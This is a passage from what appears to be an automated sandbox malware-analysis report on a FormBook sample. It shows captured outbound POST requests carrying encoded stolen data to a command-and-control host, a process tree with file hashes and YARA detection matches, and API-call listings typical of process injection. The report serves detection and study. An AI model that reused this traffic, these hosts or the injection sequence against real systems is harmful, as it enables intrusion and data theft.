                                                  Jul 1, 2024 19:27:01.960066080 CEST1236INData Raw: 72 61 70 70 65 72 20 7b 20 66 6c 65 78 3a 20 30 20 31 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 70 78 3b 20 6f 72 64 65 72 3a 20 31 3b 20 70 61 64 64 69 6e 67 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 20 70 61 64 64 69 6e 67
                                                  Data Ascii: rapper { flex: 0 1 auto; margin-top: 8px; order: 1; padding-inline-end: 0; padding-inline-start: 0; position: relative; width: 100%; } button, .nav-wrapper .secondary-button { padding: 16px 24px; } button.small-link { color: var(--google-blue-


                                                  Session ID: 42
                                                  Source IP: 192.168.2.7
                                                  Source Port: 64497
                                                  Destination IP: 84.32.84.32
                                                  Destination Port: 80
                                                  PID: 6696
                                                  Process: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp: Jul 1, 2024 19:27:07.334908962 CEST
                                                  Bytes transferred: 737
                                                  Direction: OUT
                                                  Data:
                                                  POST /ynea/ HTTP/1.1
                                                  Host: www.xn--gotopia-bya.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 218
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.xn--gotopia-bya.com
                                                  Referer: http://www.xn--gotopia-bya.com/ynea/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Ascii: FTP84=KF+D0UcHSMS2HtpEEoVbcFdJY80IERcOt4ADRtYDPM3U+VpesmLDmyBnKGGX1JwfBmdEFtxqB1TStdYffSTrGoVZZF2tJqOUHgPLqo4MN7cKYXnLVvVC8FJEGyPVqdg72F3aFdIslLvGR81XitplD/VSs/V0ljDsdtTPN/wRLLQHyFPIdxR7g8EujD1FbLlvog4CV0yeNSTK3OhDSw==


                                                  Session ID: 43
                                                  Source IP: 192.168.2.7
                                                  Source Port: 64498
                                                  Destination IP: 84.32.84.32
                                                  Destination Port: 80
                                                  Timestamp: Jul 1, 2024 19:27:11.695501089 CEST
                                                  Bytes transferred: 757
                                                  Direction: OUT
                                                  Data:
                                                  POST /ynea/ HTTP/1.1
                                                  Host: www.xn--gotopia-bya.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 238
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.xn--gotopia-bya.com
                                                  Referer: http://www.xn--gotopia-bya.com/ynea/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Ascii: FTP84=KF+D0UcHSMS2HNZEBIpbeldWGs0ITBcKt4MDRsNGM+TU+xtevkjDnyBnCmGWxJwqBmB6FoJqB1vStdIffh70E4VhC12jEKOUHgPLqo8mN7EKYnXLUOVB/FJFOSPVudg/2F38Ff9HlNjGR5xXj/NqZvUZxvUwkhyZT9W0HswqNaBj6TSqHTdX+t8VnBRzMt4aqh8aYWG/Sl2g6cAHEAI4LUqjh9H4B2JI66HFBr0=


                                                  Target ID:0
                                                  Start time:13:23:02
                                                  Start date:01/07/2024
                                                  Path:C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe"
                                                  Imagebase:0x340000
                                                  File size:686'080 bytes
                                                  MD5 hash:677B2D2D3A54E0C1D8E416B276093FB3
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:13:23:03
                                                  Start date:01/07/2024
                                                  Path:C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe"
                                                  Imagebase:0x790000
                                                  File size:686'080 bytes
                                                  MD5 hash:677B2D2D3A54E0C1D8E416B276093FB3
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1431852540.0000000001110000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1431852540.0000000001110000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1433410329.00000000020C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1433410329.00000000020C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:13
                                                  Start time:13:23:15
                                                  Start date:01/07/2024
                                                  Path:C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe"
                                                  Imagebase:0x550000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3705085363.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3705085363.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:14
                                                  Start time:13:23:16
                                                  Start date:01/07/2024
                                                  Path:C:\Windows\SysWOW64\chkntfs.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\SysWOW64\chkntfs.exe"
                                                  Imagebase:0x940000
                                                  File size:19'968 bytes
                                                  MD5 hash:A9B42ED1B14BB22EF07CCC8228697408
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3705299437.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3705299437.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3705534069.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3705534069.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:16
                                                  Start time:15:04:45
                                                  Start date:01/07/2024
                                                  Path:C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe"
                                                  Imagebase:0x550000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.3708009401.0000000005850000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.3708009401.0000000005850000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:18
                                                  Start time:15:04:57
                                                  Start date:01/07/2024
                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                  Imagebase:0x7ff722870000
                                                  File size:676'768 bytes
                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:24
                                                  Start time:15:07:23
                                                  Start date:01/07/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\aj34fjqh.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user~1\AppData\Local\Temp\aj34fjqh.exe"
                                                  Imagebase:0xd40000
                                                  File size:698'880 bytes
                                                  MD5 hash:A000A790579BE8EDD044A668469EA33E
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:25
                                                  Start time:15:07:24
                                                  Start date:01/07/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\aj34fjqh.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user~1\AppData\Local\Temp\aj34fjqh.exe"
                                                  Imagebase:0xb30000
                                                  File size:698'880 bytes
                                                  MD5 hash:A000A790579BE8EDD044A668469EA33E
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000019.00000002.3534960934.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.3534960934.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000019.00000002.3530426239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.3530426239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  Reputation:low
                                                  Has exited:true

                                                    Execution Graph

                                                    Execution Coverage:9.7%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:1.8%
                                                    Total number of Nodes:164
                                                    Total number of Limit Nodes:10
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7795d02060264b3d0d8be1140d5e58fa18842d5440daa15a8b22cf4c03d9de0e
                                                    • Instruction ID: 1f62b94bc04a868359ec768a32126a10dab97a7509f135e433e583757229026c
                                                    • Opcode Fuzzy Hash: 7795d02060264b3d0d8be1140d5e58fa18842d5440daa15a8b22cf4c03d9de0e
                                                    • Instruction Fuzzy Hash: E7326870B022049FDB19DB79C550BAEB7F6EF89704F2444A9E5069B3A1CF35E901CB61
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: efa1a8527334f2f7d91cf63a5a1fdfbec4536cf3b9da185b72e2a00d9f21fcae
                                                    • Instruction ID: 0ca865d1334ba467e0f13a12b54d11971059d0c9b9c6619840fc4ea4bf963a47
                                                    • Opcode Fuzzy Hash: efa1a8527334f2f7d91cf63a5a1fdfbec4536cf3b9da185b72e2a00d9f21fcae
                                                    • Instruction Fuzzy Hash: 9F21DB3980A214CFDF28CF55D964BE8B7BDEB49315F14A1DA880EA7291C7359A86CF10

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 00DBDC86
                                                    • GetCurrentThread.KERNEL32 ref: 00DBDCC3
                                                    • GetCurrentProcess.KERNEL32 ref: 00DBDD00
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DBDD59
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1239905303.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_db0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: 96c836cebc4e5773d3b21b6dcb69afc60fdd02a3364f4bbfdc12831aa4b2df10
                                                    • Instruction ID: 4b22dc96a1f59a18ddda7c550036b5199377b28b9038e807201079367aec9bbb
                                                    • Opcode Fuzzy Hash: 96c836cebc4e5773d3b21b6dcb69afc60fdd02a3364f4bbfdc12831aa4b2df10
                                                    • Instruction Fuzzy Hash: 645149B0900709CFEB14DFAAD5487DEBBF2EF48314F248059E019A7360D7B5A945CB66

                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 026E13BE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: d4742e6c9bb690f1b16f88c329c9fc783abf7ccc24914078775ff17795a3d2af
                                                    • Instruction ID: fb56c59ba922a7dffcff55cba3ae34699c74019202512fd73a78433a83e5ee5a
                                                    • Opcode Fuzzy Hash: d4742e6c9bb690f1b16f88c329c9fc783abf7ccc24914078775ff17795a3d2af
                                                    • Instruction Fuzzy Hash: EDA13A71D01219CFEF24CF68C881BEEBBB2AF49314F1481A9E819A7240DB759985DF91

                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 026E13BE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: 13a810cbe53c9160aca8b0b009f2f88fb1fc1f259fcf2cf12e701f6ac1e6d61b
                                                    • Instruction ID: 3be135b57ad5c55460780b26e28c5fa241f141ce2f82143021cea6e5f6e20a0e
                                                    • Opcode Fuzzy Hash: 13a810cbe53c9160aca8b0b009f2f88fb1fc1f259fcf2cf12e701f6ac1e6d61b
                                                    • Instruction Fuzzy Hash: D7913B71D01219CFEF24CF68C881BEEBBB2AF49314F1481A9E819A7340DB759985DF91

                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 00DB34D1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1239905303.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_db0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 8bd3b6cb021440448dc0e1567a3425ebbf61d33f7af9ffe63ee29cb345fa79e3
                                                    • Instruction ID: d586b829f60eeba72f2b55990b36be3ae33fb1b9a72747abc11e916435b973d4
                                                    • Opcode Fuzzy Hash: 8bd3b6cb021440448dc0e1567a3425ebbf61d33f7af9ffe63ee29cb345fa79e3
                                                    • Instruction Fuzzy Hash: 4741E271C00719CFEB24DFA9C8447DEBBF5AF48314F24846AD409AB251DB756A4ACF60

                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 00DB34D1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1239905303.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_db0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: fb7e2bfe05a7da35bd9d7563121ff39b28fa1b45613738707003dc5633aac7e3
                                                    • Instruction ID: f6015b732aa2239053be78ad28a08c44858490e7108ed6fc233a6e221d2a0d10
                                                    • Opcode Fuzzy Hash: fb7e2bfe05a7da35bd9d7563121ff39b28fa1b45613738707003dc5633aac7e3
                                                    • Instruction Fuzzy Hash: 4141B271C00719CBEB24DFA9C844BDEBBF5BF48304F20856AD409AB251DBB56946CFA0

                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 026E0B90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: 2e5a362756cd108dd00b40dfa58c29279f30963ac8d7642dd9c6b35f9182d11a
                                                    • Instruction ID: 6289139663d0e61694b1a8c2eda88a1bd1e655f79d58904f4ef001331b39d154
                                                    • Opcode Fuzzy Hash: 2e5a362756cd108dd00b40dfa58c29279f30963ac8d7642dd9c6b35f9182d11a
                                                    • Instruction Fuzzy Hash: 85212371D0034A9FDB10CFA9C881BEEBBF1FB48314F50842AE959A7241D7799945CBA0

                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 026E0B90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: a886e0756c879b09120ad33836e15fcfd0c34f08ea5664d1f9ad8d9f85d9c595
                                                    • Instruction ID: f719fe2baeabe13ff0f0ec46a18794efac6228a0bef5c14b62cbb5b94700d5f1
                                                    • Opcode Fuzzy Hash: a886e0756c879b09120ad33836e15fcfd0c34f08ea5664d1f9ad8d9f85d9c595
                                                    • Instruction Fuzzy Hash: 12211375D003499FDF10DFAAC881BDEBBF5FB48314F50842AE959A7240D7799940CBA4

                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 026E0C70
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: 0841d7b7052219fef2f4cfcb5acd1d09d4c1f8751bfe4347f6b6f86f4af26d11
                                                    • Instruction ID: 3e59e8a687e49783e35e3168ce9e028ec1cb453bf2d1327c76f84d35b83effcf
                                                    • Opcode Fuzzy Hash: 0841d7b7052219fef2f4cfcb5acd1d09d4c1f8751bfe4347f6b6f86f4af26d11
                                                    • Instruction Fuzzy Hash: 4E2127B1C013499FDB10DFAAC981BEEBBF5FF48310F50842AE959A7240C7799545CBA4

                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 026E0C70
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: 7839dcda41568fe2fd2a26894ee17ccb345a0a2887074fa4c0af2ce8e5af74c5
                                                    • Instruction ID: 870f6d8642bed3e0d91eb782cc5cf85610839868a3be6349e24e1de7bc37a622
                                                    • Opcode Fuzzy Hash: 7839dcda41568fe2fd2a26894ee17ccb345a0a2887074fa4c0af2ce8e5af74c5
                                                    • Instruction Fuzzy Hash: 99211671C003499FDB10DFAAC981BDEBBF5FF48310F508429E919A7240C7799905CBA4

                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 026E09E6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: 7e0d1aba89739431cd9e056338f8fae2a2840396b451047e1e0ade9d48aaef79
                                                    • Instruction ID: 64b20f8ba4fce7e4278a5a9c5144f03793b6fe61620899daefedd63ee9c29203
                                                    • Opcode Fuzzy Hash: 7e0d1aba89739431cd9e056338f8fae2a2840396b451047e1e0ade9d48aaef79
                                                    • Instruction Fuzzy Hash: 72213471D003098FDB10DFAAC585BAEBBF4AB58224F54842AD459A7340CB78A945CFA4

                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00DBE2DF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1239905303.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_db0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: d72e2b07718010960abd537190a1a64b5aab09c0381e039cf79e67f835091092
                                                    • Instruction ID: 78d7d17f407993f4f5aad1b5dcc6cbee708b625d7d42ec166114105de01b27c8
                                                    • Opcode Fuzzy Hash: d72e2b07718010960abd537190a1a64b5aab09c0381e039cf79e67f835091092
                                                    • Instruction Fuzzy Hash: 9621E3B5D002499FDB10CF9AD984ADEBBF8EB48310F14801AE919A3350D379A940CFA4
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 026E09E6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: 3135a580d5876fad51a406fc791a21fb5c40add3f3bc667b123d44e463568eb0
                                                    • Instruction ID: ebe3c974994c2fe8a80d911f452c609665381ef2a3340d92f1335eb4a7bc18f7
                                                    • Opcode Fuzzy Hash: 3135a580d5876fad51a406fc791a21fb5c40add3f3bc667b123d44e463568eb0
                                                    • Instruction Fuzzy Hash: 3E215471E003098FEB10CFA9C1817EEBBF0AF58214F60C42AD459AB241CB799946CF94
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 026E0AAE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: e821dc5a94e8b688007b1f8f5a6f7f8f64ea853d7420ffdcd02111e805f595af
                                                    • Instruction ID: 45dde7082f1d7629a4c452138352d7a6543e5aa1d5ed01122451617e931d4705
                                                    • Opcode Fuzzy Hash: e821dc5a94e8b688007b1f8f5a6f7f8f64ea853d7420ffdcd02111e805f595af
                                                    • Instruction Fuzzy Hash: E3112671D003499FDF20DFAAC845BDEBBF5EB48320F148419E519A7250CB75A940CFA4
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 026E0AAE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: f1a1d9acf9712bb7d93805780c943c3834882efd0a3bd046c23d5785e4a7a15c
                                                    • Instruction ID: 9037d28a68c038daebdc0d308ed98c50419dee980da5badb0be5542d8410c40d
                                                    • Opcode Fuzzy Hash: f1a1d9acf9712bb7d93805780c943c3834882efd0a3bd046c23d5785e4a7a15c
                                                    • Instruction Fuzzy Hash: 34115372E003498FCF20CFA9C840BDEBBF1AF48314F24885ED556A7251CB7A9505CBA0
                                                    APIs
                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 026E49E0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotification
                                                    • String ID:
                                                    • API String ID: 2591292051-0
                                                    • Opcode ID: 28e62ef1c0f181163c9a82a70bcc14538f1a67f8161af69216b25ab89ef2a2be
                                                    • Instruction ID: 73b960e5449c28d82f0c77db1de509c41c5085dc383d6f6237938e5358cdbf87
                                                    • Opcode Fuzzy Hash: 28e62ef1c0f181163c9a82a70bcc14538f1a67f8161af69216b25ab89ef2a2be
                                                    • Instruction Fuzzy Hash: B21116B58003499FCB20DFA9D585BDEBBF4FB48320F24841AD559A7240CB39A945CFA5
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 00DBC332
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1239905303.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_db0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: cfe58fc7c74c80d9a1d26f6396d4d685155724621588cfef0b672431f8094675
